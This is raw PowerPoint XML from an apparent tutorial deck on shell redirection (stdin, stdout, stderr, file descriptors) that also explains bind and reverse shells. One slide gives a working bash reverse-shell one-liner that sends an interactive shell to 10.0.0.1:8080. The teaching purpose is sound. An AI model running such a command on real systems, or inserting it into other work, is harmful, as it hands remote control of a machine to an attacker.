              <a:t>) and Standard Error (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You can redirect these outputs to a different place (like a file);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>File descriptors are used to identify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (1) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>command &gt; output is just a shortcut for command 1&gt; output;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>You can use &amp;[FILE_DESCRIPTOR] to reference a file descriptor value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Using 2&gt;&amp;1 will redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to whatever value is set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (and 1&gt;&amp;2 will do the opposite).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="965843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 Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bind shell - attacker's machine acts as a client and victim's machine acts as a server opening up a communication port on the victim and waiting for the client to connect to it and then issue commands that will be remotely (with respect to the attacker) executed on the victim's machine. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>etc. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>may block the bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4943729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 Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shell - attacker's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>acts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as a server. It opens a communication channel on a port and waits for incoming connections. Victim's machine acts as a client and initiates a connection to the attacker's listening server. This is exactly what is done by the following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="69850" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/10.0.0.1/8080 0&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20582540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Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>en.wikipedia.org/wiki/Standard_streams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.brianstorti.com/understanding-shell-script-idiom-redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.computerhope.com/unix/nc.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3782016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a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4012834" y="1105996"/>
            <a:ext cx="4267380" cy="2735799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717047" y="1973525"/>
            <a:ext cx="1513036" cy="8157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Process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4993019" y="1545928"/>
            <a:ext cx="1355154" cy="546009"/>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Keyboard/file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4993019" y="2516244"/>
            <a:ext cx="1355154" cy="546009"/>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Display/file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2008504" y="1743281"/>
            <a:ext cx="2892417" cy="349704"/>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12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523196" y="1631320"/>
            <a:ext cx="974947" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230083" y="2381387"/>
            <a:ext cx="2762936" cy="407861"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Elbow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="3140372" y="1122442"/>
            <a:ext cx="185840" cy="3519454"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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744774" y="2191081"/>
            <a:ext cx="1133644" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427400" y="3078343"/>
            <a:ext cx="1351652" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>err </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="969276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Standard output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>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
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473645" y="1749858"/>
            <a:ext cx="1513036" cy="8157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echo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1986681" y="2157720"/>
            <a:ext cx="2052467" cy="243402"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501372" y="1967414"/>
            <a:ext cx="1133644" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4091565" y="1541501"/>
            <a:ext cx="4486901" cy="2048161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2089025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Another example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426284" y="1520823"/>
            <a:ext cx="4319588" cy="2833715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4900182" y="1290953"/>
            <a:ext cx="4243818" cy="3063585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1435293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Standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stdin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>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5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717047" y="1973525"/>
            <a:ext cx="1513036" cy="8157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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="7"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2008504" y="1743281"/>
            <a:ext cx="2892417" cy="349704"/>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12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2523196" y="1631320"/>
            <a:ext cx="974947" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4975293" y="1008812"/>
            <a:ext cx="3600953" cy="1552792"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639319" y="3296756"/>
            <a:ext cx="7146508" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Display the content of a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tell cat to take input from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myfile.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send the myflle.txt content to input device,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cat to take input from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the device, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same as 2 (0 is a default input device)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4536549" y="4364019"/>
            <a:ext cx="2438400" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3015196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Standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>error: </a:t>
            </a:r>
            <a:r>
